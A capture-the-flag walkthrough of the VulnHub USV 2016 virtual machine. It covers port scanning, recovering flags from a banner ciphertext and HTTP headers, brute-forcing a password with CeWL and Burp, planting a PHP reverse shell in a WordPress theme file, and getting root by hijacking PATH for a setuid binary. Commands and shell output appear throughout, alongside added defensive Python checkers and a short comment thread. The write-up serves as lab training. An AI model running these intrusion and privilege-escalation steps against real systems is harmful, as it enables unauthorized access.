USV: 2016
Location
https://download.vulnhub.com/usv-2016/USV-CTF.ova
Introduction
Instructions: The CTF is a virtual machine and has been tested in VirtualBox. It has all required drivers if you want it to run on VMware or KVM (virtio). The network interface of the virtual machine will take its IP settings from DHCP.
Flags: There are 7 flags that should be discovered in the form of: Country_name Flag: [md5 hash]. On the CTF platform of the CTF-USV competition there was a hint available for each flag, but accessing it would imply a penalty. If you need any of those hints to solve the challenge, send me a message on Twitter @gusu_oana and I will be glad to help.
About: CTF-USV 2016 was the first International Students Contest in Information Security organized in Romania by Suceava University. Security challenge creation, evaluation of results and building of the CTF environment were provided by the Safetech Tech Team: Oana Stoian (@gusu_oana), Teodor Lupan (@theologu) and Ionut Georgescu (@ionutge1)
Getting Started
Starting with a nmap scan.
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $sudo nmap -A -T4 -sSV -p- 192.168.171.3

Starting Nmap 7.40 ( https://nmap.org ) at 2016-12-28 21:27 CET
Nmap scan report for 192.168.171.3
Host is up (0.00088s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 7.3 (protocol 2.0)
| ssh-hostkey:
|   2048 d8:b9:dd:8e:e7:d1:95:52:2c:98:bf:e0:65:7a:b0:92 (RSA)
|_  256 08:03:90:eb:24:5b:dd:67:f9:1f:4d:1e:60:93:a7:e3 (ECDSA)
80/tcp    open  http       Apache httpd
|_http-server-header: Apache
|_http-title: Access forbidden!
3129/tcp  open  http-proxy Squid http proxy 3.5.22
|_http-server-header: squid/3.5.22
|_http-title: ERROR: The requested URL could not be retrieved
3306/tcp  open  mysql      MariaDB (unauthorized)
4444/tcp  open  krb524?
| fingerprint-strings:
|   NULL:
|     HTTP/1.0 504 Gateway Timeout
|     Pragma: no-cache
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|_    <html><body>Connection to server <b></b> failed (Connection actively refused by the server.)<P></body></html> {600}
21211/tcp open  ftp        vsftpd 2.0.8 or later
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4444-TCP:V=7.40%I=7%D=12/28%Time=58642048%P=x86_64-pc-linux-gnu%r(N
SF:ULL,E1,"HTTP/1\.0\x20504\x20Gateway\x20Timeout\r\nPragma:\x20no-cache\r
SF:\nConnection:\x20close\r\nContent-Type:\x20text/html;\x20charset=utf-8\
SF:r\n\r\n<html><body>Connection\x20to\x20server\x20<b></b>\x20failed\x20\
SF:(Connection\x20actively\x20refused\x20by\x20the\x20server\.\)<P></body>
SF:</html>\x20{600}\n");
MAC Address: 08:00:27:2B:64:55 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: SevenKingdoms

TRACEROUTE
HOP RTT     ADDRESS
1   0.88 ms 192.168.171.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.55 seconds
The scan turns up a lot of open ports and services. There is SSH, HTTP, an HTTP proxy (Squid), MySQL (MariaDB), something nmap tentatively labels as Kerberos (krb524?) on port 4444, and an FTP server on a high, non-standard port.
The host name is “SevenKingdoms”, a reference to the TV show “Game of Thrones”.
I’ll start by checking whether the SSH server shows an interesting banner.
I get a nice picture and an encrypted (or hashed and salted) string. Looking at the picture more closely, I see a hidden message: some letters stand out and, combined, spell out AES ECB.
There are also characters visible near the tail. So I have a cipher (AES in ECB mode), a key and a piece of ciphertext.
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo 'wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB' | openssl enc -aes-128-ecb -d -a -k xxxxx0000000xxxxxx
bad magic number
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo 'wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB' | openssl enc -aes-192-ecb -d -a -k xxxxx0000000xxxxxx
bad magic number
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo 'wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB' | openssl enc -aes-256-ecb -d -a -k xxxxx0000000xxxxxx
bad magic number
As this doesn’t give me the desired response, I try an online solution with more luck.
Italy Flag: 0047449b33fbae830d833721edaef6f1
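The “bad magic number” error above is caused by the -k option: with a password, openssl enc expects the input to begin with the 8-byte Salted__ magic followed by an 8-byte salt, from which it derives the key, and the banner ciphertext is a raw AES-ECB blob with no such header. For a raw key the hex form -K is the matching option. The following Python script is an added example (not part of the original write-up) that inspects a base64 blob for that header, counts its AES blocks, flags repeated blocks (the classic weakness of ECB mode), and builds the matching openssl flags. The 16-byte key it passes is a constructed placeholder, since the real key is masked in the write-up, and the salted sample is constructed too.

```python
import base64
from typing import Dict, List

# Ciphertext exactly as quoted from the SSH banner in the write-up above.
BANNER_CIPHERTEXT_B64 = "wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB"

# openssl enc -k / -pass writes this 8-byte magic plus an 8-byte salt in front
# of the ciphertext and derives the key from password + salt; on decryption it
# refuses input that lacks the header with "bad magic number".
OPENSSL_MAGIC = b"Salted__"
AES_BLOCK = 16

# Constructed salted blob (header + salt 00..07 + two identical blocks), not
# real openssl output; it is here only to exercise the salted code path.
SALTED_SAMPLE_B64 = base64.b64encode(
    OPENSSL_MAGIC + bytes(range(8)) + b"A" * 32
).decode()


def inspect_openssl_blob(b64_text: str) -> Dict[str, object]:
    """Describe a base64 blob the way openssl enc -d would interpret it."""
    raw = base64.b64decode(b64_text, validate=True)
    salted = len(raw) >= 16 and raw.startswith(OPENSSL_MAGIC)
    body = raw[16:] if salted else raw
    return {
        "total_len": len(raw),
        "salted": salted,
        "salt_hex": raw[8:16].hex() if salted else None,
        "body_len": len(body),
        "block_aligned": len(body) % AES_BLOCK == 0,
        "blocks": len(body) // AES_BLOCK,
    }


def duplicate_blocks(b64_text: str) -> int:
    """Repeated 16-byte ciphertext blocks: ECB encrypts equal plaintext blocks
    to equal ciphertext blocks, so any repeat is a leak (and an ECB tell)."""
    raw = base64.b64decode(b64_text, validate=True)
    body = raw[16:] if raw.startswith(OPENSSL_MAGIC) else raw
    usable = len(body) - len(body) % AES_BLOCK
    blocks = [body[i:i + AES_BLOCK] for i in range(0, usable, AES_BLOCK)]
    return len(blocks) - len(set(blocks))


def openssl_decrypt_args(b64_text: str, secret: bytes, bits: int = 128) -> List[str]:
    """Build the openssl enc flags that match how the blob was produced:
    -k (password, salted header present) or -K (raw hex key, no header)."""
    info = inspect_openssl_blob(b64_text)
    if not info["block_aligned"]:
        raise ValueError("ciphertext length is not a multiple of 16 bytes")
    cipher = "-aes-%d-ecb" % bits
    if info["salted"]:
        return ["openssl", "enc", cipher, "-d", "-a", "-k", secret.decode()]
    if len(secret) != bits // 8:
        raise ValueError("raw key must be %d bytes for AES-%d" % (bits // 8, bits))
    return ["openssl", "enc", cipher, "-d", "-a", "-K", secret.hex()]


if __name__ == "__main__":
    print(inspect_openssl_blob(BANNER_CIPHERTEXT_B64))
    # Placeholder key: the real key is masked in the write-up.
    print(" ".join(openssl_decrypt_args(BANNER_CIPHERTEXT_B64, b"PLACEHOLDER_KEY!")))
```

Run against the banner blob it reports 48 bytes, no Salted__ header and three AES blocks, which is why -k fails and -K with the 16-byte key (AES-128) is the right invocation; ECB needs no IV, so no -iv argument is added.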
Next stop is port 80. Browsing to the website gives me a custom-made error 403.
All scans turn up the same 403. Running Nikto shows that the directory /icons/ is accessible. Because it holds a lot of pictures I could wget them all (in the hope that one of them is altered), but since there are more leads to follow I note it down and continue the search.
When I request the website again, this time through Burp Suite, I can see an XSS-protection header in the server response whose value is a base64-encoded string.
Q3JvYXRpYSBGbGFnOiAwYzMyNjc4NDIxNDM5OGFlYjc1MDQ0ZTljZDRjMGViYg==
A quick decode gives me my second flag: Croatia Flag: 0c326784214398aeb75044e9cd4c0ebb
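Checking a server for data leaking through response headers is the defensive counterpart of what the write-up found here. The following Python script is an added example (not from the original write-up): it parses a raw HTTP response, looks for base64-looking tokens in header values, and reports those that decode to printable text. The response it runs on is constructed for the example, modelled on the observation above (X-XSS-Protection as the header name is my assumption, since the write-up only says “XSS protection”); the cookie value is constructed too.

```python
import base64
import binascii
import re
import string
from typing import List, Optional, Tuple

# Constructed response (not a real capture), modelled on the observation above:
# an XSS-protection header carrying a base64 value instead of "1; mode=block".
SAMPLE_RESPONSE = (
    "HTTP/1.1 403 Forbidden\r\n"
    "Server: Apache\r\n"
    "X-XSS-Protection: Q3JvYXRpYSBGbGFnOiAwYzMyNjc4NDIxNDM5OGFlYjc1MDQ0ZTljZDRjMGViYg==\r\n"
    "Set-Cookie: session=dGhpcyBpcyBub3QgYSBzZWNyZXQ=; Path=/; HttpOnly\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "ETag: \"3181-5436a9d1\"\r\n"
    "\r\n"
    "<html><body>Access forbidden!</body></html>"
)

# At least 16 base64 characters: short enough to catch flags and tokens,
# long enough to skip ordinary words such as "SAMEORIGIN".
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
PRINTABLE = set(string.printable) - {"\x0b", "\x0c"}


def parse_headers(raw: str) -> List[Tuple[str, str]]:
    """Split a raw response into (name, value) header pairs, body ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:        # skip the status line
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers


def decode_if_text(token: str) -> Optional[str]:
    """Return the decoded text if token is valid base64 for printable ASCII."""
    if len(token) % 4:
        return None
    try:
        data = base64.b64decode(token, validate=True)
        text = data.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text and all(c in PRINTABLE for c in text) else None


def find_encoded_leaks(raw: str) -> List[Tuple[str, str, str]]:
    """(header, token, decoded text) for every header value that hides text."""
    findings = []
    for name, value in parse_headers(raw):
        for token in B64_TOKEN.findall(value):
            text = decode_if_text(token)
            if text is not None:
                findings.append((name, token, text))
    return findings


if __name__ == "__main__":
    for name, token, text in find_encoded_leaks(SAMPLE_RESPONSE):
        print("%s: %s -> %r" % (name, token, text))
```

The printable-text filter keeps the signal clean: a binary session identifier that happens to be base64 is not reported, while a flag, a readable token or an encoded password in a header or cookie is.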
There are more open ports. One of them is a Squid proxy server on port 3129. After some reading I learned that Squid is a caching web proxy that provides proxy and cache services for protocols such as HTTP. So my next step is to run my browser through that proxy and see whether the website on port 80 behaves differently.
With dirb, run through the proxy, I find a blog.
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $dirb http://192.168.171.3/ -p http://192.168.171.3:3129

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Dec 29 11:45:49 2016
URL_BASE: http://192.168.171.3/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://192.168.171.3:3129

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.171.3/ ----
==> DIRECTORY: http://192.168.171.3/blog/
+ http://192.168.171.3/index.html (CODE:200|SIZE:3181)

---- Entering directory: http://192.168.171.3/blog/ ----
+ http://192.168.171.3/blog/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.171.3/blog/wp-admin/
==> DIRECTORY: http://192.168.171.3/blog/wp-content/
==> DIRECTORY: http://192.168.171.3/blog/wp-includes/
+ http://192.168.171.3/blog/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.171.3/blog/wp-admin/ ----
+ http://192.168.171.3/blog/wp-admin/admin.php (CODE:302|SIZE:0)
-----SNIP-----
Browsing the blog, I found a few things that caught my attention. One of them was a picture of Hodor with the text “I have a message for you!”
After downloading it to my machine there was nothing to be found with exiftool or hexdump. But inside the folder where the picture resided there was something else: a zip file.
When I downloaded the file and extracted the picture inside it, I got another view of Hodor, this time with my next flag. The string was part of the picture itself rather than metadata, so I used an online OCR scanner to get the string the easy way.
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'UG9ydHVnYWwgRmxhZzogYTI2NjNiMjMwNDVkZTU2YzdlOTZhNDA2NDI5ZjczM2Y=' | base64 -d
Portugal Flag: a2663b23045de56c7e96a406429f733f
Next I proceed with the second interesting find on the website: a protected area that requires a password. Because there is a lot of text on the website about “Game of Thrones”, I figure the password could be somewhere in there, so I create a wordlist with CeWL.
┌─[n13mant@planetmars]─[~]
└──╼ $cewl -d 2 -m 5 --proxy_host 192.168.171.3 --proxy_port 3129 -w ./Desktop/tgot.list http://192.168.171.3/blog/
To understand how the password is submitted I followed the HTTP requests in Burp. When I enter a random password, the process starts with a POST request followed by a GET request that carries a cookie. This cookie consists of the encoded password I entered.
So to brute-force the password successfully I need Burp Suite to follow the redirects and add the cookies it is given.
With this password I get the next flag.
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'UGFyYWd1YXkgRmxhZzogNDc2MWI2NWYyMDA1MzY3NDY1N2M3ZTYxODY2MjhhMjk=' | base64 -d
Paraguay Flag: 4761b65f20053674657c7e6186628a29
On the same page there is a clue about a password.
At first I thought the facial expressions might hold a clue to the password. But I’ve learned from previous challenges that the easiest explanation is often the right one and that the needed credentials are in plain sight. So I needed to interpret the text as literally as possible.
The “mother_of_dragons” has a password which is “in front of your eyes”.
With this credential I checked the remaining services on the open ports. On the FTP server it let me in.
On the server there is a file called “readme.txt” whose content is “I keep a hidden note for myself”. A hidden ‘note’. As before, the answer is in plain sight: the hidden note turned up when browsing to “/.note.txt”.
I always forgot passwords, so for my blog account I used my children`s name. -= Daenerys =-
No flag, but a good clue about the password needed for the admin part of the WordPress blog.
The clue said “children’s name”, plural. So it could be her son, or maybe the dragons, since she sees them as her children.
Because there is a handy feature to reset the password, I could figure out which username was correct. At first I thought it was “Daenerys”, but it turned out to still be “mother_of_dragons”. As for the password, it was a combination of all the dragon names that got me in.
After some browsing I found the next flag in the profile of the mother of dragons.
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'VGhhaWxhbmQgRmxhZzogNmFkNzk2NWQxZTA1Y2E5OGIzZWZjNzZkYmY5ZmQ3MzM=' | base64 -d
Thailand Flag: 6ad7965d1e05ca98b3efc76dbf9fd733
To get a reverse shell I edited the search.php file and added the PHP reverse shell script from pentestmonkey to it. Next I opened a listener on my end and pressed the search button to trigger the script.
┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 31337
listening on [any] 31337 ...
connect to [192.168.171.2] from (UNKNOWN) [192.168.171.3] 38870
Linux arch 4.8.8-1-ARCH #1 SMP PREEMPT Tue Nov 15 08:25:24 CET 2016 x86_64 GNU/Linux
 07:58:47 up 11:45,  0 users,  load average: 0.03, 0.06, 0.02
USER     TTY      LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(http) gid=33(http) groups=33(http)
sh: cannot set terminal process group (242): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4$ id
id
uid=33(http) gid=33(http) groups=33(http)
After searching inside the system I found the next flag.
[http@arch /]$ ls -lah
ls -lah
total 57K
drwxr-xr-x  17 root root 4.0K Nov  7 20:39 .
drwxr-xr-x  17 root root 4.0K Nov  7 20:39 ..
lrwxrwxrwx   1 root root    7 Sep 30  2015 bin -> usr/bin
drwxr-xr-x   4 root root 1.0K Nov 16 12:30 boot
drwxr-xr-x  17 root root 2.9K Dec 28 20:13 dev
drwxr-xr-x  51 root root 4.0K Dec  8 17:51 etc
drwxr-xr-x   3 root root 4.0K Nov 16 15:44 home
lrwxrwxrwx   1 root root    7 Sep 30  2015 lib -> usr/lib
lrwxrwxrwx   1 root root    7 Sep 30  2015 lib64 -> usr/lib
drwx------   2 root root  16K Dec  5  2013 lost+found
drwxr-xr-x   2 root root 4.0K May 31  2013 mnt
drwxr-xr-x   2 root root 4.0K May 31  2013 opt
dr-xr-xr-x  95 root root    0 Dec 28 20:13 proc
drwxr-x---   7 root root 4.0K Dec 28 20:13 root
drwxr-xr-x  19 root root  600 Dec 28 20:13 run
lrwxrwxrwx   1 root root    7 Sep 30  2015 sbin -> usr/bin
drwxr-xr-x   4 root root 4.0K May 31  2013 srv
dr-xr-xr-x  13 root root    0 Dec 29 08:01 sys
drwxrwxrwt   2 root root   40 Dec 28 20:13 tmp
drwxr-xr-x   8 root root 4.0K Nov  7 20:39 usr
drwxr-xr-x  12 root root 4.0K Nov  7 19:58 var
[http@arch /]$ cd srv
cd srv
[http@arch srv]$ ls -lah
ls -lah
total 16K
drwxr-xr-x  4 root root 4.0K May 31  2013 .
drwxr-xr-x 17 root root 4.0K Nov  7 20:39 ..
dr-xr-xr-x  2 root ftp  4.0K May 31  2013 ftp
drwxr-xr-x  3 root root 4.0K Nov 17 15:43 http
[http@arch srv]$ cd http
cd http
[http@arch http]$ ls -lah
ls -lah
total 92K
drwxr-xr-x 3 root root 4.0K Nov 17 15:43 .
drwxr-xr-x 4 root root 4.0K May 31  2013 ..
drwxr-xr-x 6 http http 4.0K Dec  4 06:01 blog
-rw-r--r-- 1 root root  59K Nov 16 19:59 gtr.jpg
-rw-r--r-- 1 root root 3.2K Nov 16 20:01 index.html
-rw-r--r-- 1 root root   65 Nov 17 15:41 reward_flag.txt
-rwsr-sr-x 1 root root 8.3K Nov 17 14:55 winterfell_messenger
[http@arch http]$ cat reward_flag.txt
cat reward_flag.txt
TW9uZ29saWEgRmxhZzogNmI0OWMxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ=
[http@arch http]$ echo 'TW9uZ29saWEgRmxhZzogNmI0OWMxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ=' | base64 -d
Mongolia Flag: 6b49c13cccd91940f09d79e142108394
There is a file called “winterfell_messenger” which is owned by root and has the setuid and setgid bits set (-rwsr-sr-x).
[http@arch http]$ ./winterfell_messenger
./winterfell_messenger
cat: /root/message.txt: No such file or directory
When I run it I can see that it tries to use the command “cat” to read a file called “/root/message.txt”.
[http@arch http]$ strings winterfell_messenger
strings winterfell_messenger
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__libc_start_main
__gmon_start__
GLIBC_2.2.5
UH-8
AWAVA
AUATL
[]A\A]A^A_
cat /root/message.txt
;*3$"
GCC: (GNU) 6.1.1 20160802
GCC: (GNU) 6.2.1 20160830
-----SNIP-----
So the “setuid” bit is set and the command “cat” is invoked by its bare name rather than an absolute path, which means the shell started by system() resolves it through PATH. To obtain root I’m going to create a file called “cat” whose content is “/bin/bash”.
The directory holding this file will be prepended to PATH so the program runs my version of “cat” instead of the real one.
[http@arch http]$ echo "/bin/bash" > /tmp/cat
echo "/bin/bash" > /tmp/cat
[http@arch http]$ chmod +x /tmp/cat
chmod +x /tmp/cat
[http@arch http]$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
[http@arch http]$ export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
[http@arch http]$ echo $PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
[http@arch http]$ cd /srv/http
cd /srv/http
[http@arch http]$ ./winterfell_messenger
./winterfell_messenger
[root@arch http]# id
id
uid=0(root) gid=33(http) groups=33(http)
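The escalation above hinges on two defects together: the binary runs with the setuid bit, and it calls system() with a bare command name that the shell resolves through the caller's PATH. A defender triaging a host for the same pattern can check both the binary and the environment. The Python script below is an added example (not part of the original write-up or of the challenge): it extracts printable strings from a binary the way strings(1) does, flags binaries that combine a setuid call with a shell-executing call and an unqualified command, and checks PATH entries for world-writable, relative or empty directories. The byte blob it scans is constructed to resemble the strings listed above; winterfell_messenger itself is not included. The fix for such a program is an absolute path (or, better, opening the file directly without a shell) and a PATH reset before any exec.

```python
import os
import re
import stat
from typing import Dict, List

# Directories that are world-writable on a normal Linux install; a PATH entry
# pointing here lets any local user plant a fake "cat".
WORLD_WRITABLE_DIRS = {"/tmp", "/var/tmp", "/dev/shm"}

# Constructed stand-in for the binary's contents (not the real file): an ELF
# magic, the libc symbol names the write-up saw, and the unqualified command.
FAKE_MESSENGER = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"libc.so.6\x00setuid\x00system\x00__libc_start_main\x00"
    + b"\x90" * 32
    + b"cat /root/message.txt\x00" + b"\x00" * 16
)

PRIV_CALLS = {"setuid", "seteuid", "setresuid"}
SHELL_CALLS = {"system", "popen", "execvp", "execlp", "execvpe"}
# A bare lowercase word followed by at least one argument, e.g. "cat /root/x";
# symbol names and version strings do not match this shape.
BARE_COMMAND = re.compile(r"[a-z][a-z0-9_-]*( [^ ]+)+")


def extract_strings(blob: bytes, min_len: int = 4) -> List[str]:
    """Printable ASCII runs of at least min_len bytes, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def triage_strings(strings: List[str]) -> Dict[str, object]:
    """Flag the setuid + shell-exec + unqualified-command combination."""
    privileged = any(s in PRIV_CALLS for s in strings)
    shell_exec = any(s in SHELL_CALLS for s in strings)
    unqualified = [s for s in strings if BARE_COMMAND.fullmatch(s)]
    return {
        "privileged": privileged,
        "shell_exec": shell_exec,
        "unqualified_commands": unqualified,
        "path_hijackable": privileged and shell_exec and bool(unqualified),
    }


def path_entries_untrusted(path_env: str) -> List[str]:
    """PATH entries an unprivileged user could use to shadow a command."""
    bad = []
    for entry in path_env.split(":"):
        if entry in ("", ".") or not entry.startswith("/"):
            bad.append(entry or "<empty>")   # empty entry means the current directory
            continue
        norm = os.path.normpath(entry)
        if norm in WORLD_WRITABLE_DIRS:
            bad.append(entry)
            continue
        try:
            st = os.stat(norm)
        except OSError:
            continue   # missing directory: nothing can be planted in it (yet)
        if st.st_mode & stat.S_IWOTH:
            bad.append(entry)
    return bad


def path_is_trusted(path_env: str) -> bool:
    return not path_entries_untrusted(path_env)


def find_setuid_binaries(root: str) -> List[str]:
    """Walk a tree and list regular files with the setuid bit, for triage."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(full)
    return hits


if __name__ == "__main__":
    print("constructed sample:", triage_strings(extract_strings(FAKE_MESSENGER)))
    print("untrusted PATH entries:",
          path_entries_untrusted("/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin"))
```

On the hijacked PATH from the session above the checker reports /tmp, and on the original PATH it reports nothing; the string triage on the constructed blob reports “cat /root/message.txt” as the unqualified command and marks the combination as hijackable. Running find_setuid_binaries over /srv or /usr is how the same search would be done across a whole tree.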
After getting root it’s time to get the final flag.
[root@arch root]# /usr/sbin/cat .flag.txt
/usr/sbin/cat .flag.txt
Congratulations!
(ASCII-art banner, flattened by extraction)
U29tYWxpYSBGbGFnOiA0YTY0YTU3NWJlODBmOGZmYWIyNmIwNmE5NThiY2YzNA==
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'U29tYWxpYSBGbGFnOiA0YTY0YTU3NWJlODBmOGZmYWIyNmIwNmE5NThiY2YzNA==' | base64 -d
Somalia Flag: 4a64a575be80f8ffab26b06a958bcf34
Conclusion
A fun challenge with some nice features.
Could you please post exactly how to set up BURP SUITE — I’ve spent like 3 days going through different POST and GET and transitioning between what to define in the ADD portion and launching attacks to brute force the password…. I’m on the Secret Chapter page… But what should the Target IP and Port be, the Positions (what to define in the ADD), the Payloads (CEWL wordlist), and options. I’m getting 400’s and 403’s on both POST and GET – but joy on finding a 200 listing for the password.
I can get the Cookies and forwards from the webpage. I’m starting with the actual server refresh then re-doing the Settings in Iceweasel to 127.0.0.1 8080 – and submitting a 1234 password to get a response. At some point, I changed it back to the USV server’s IP address and start new attacks…but nothing…
Many Thanks! J
Hi Jo.
In my write-up I’ve explained that you need to enable the options ‘follow redirections’ and ‘process cookies’.
The rest is normal procedure with a brute-force attack. You need to acquire the wordlist and run the attack.
As you can see in my example you will get a lot of code 200. But there is one thing that stands out from the rest. If you find that, you’ll find the password.
If you need more information on how Burpsuite works, this will be a great read: part 1 and part 2
Excellent – thanks. I just picked up the Burp Suite book off of Amazon…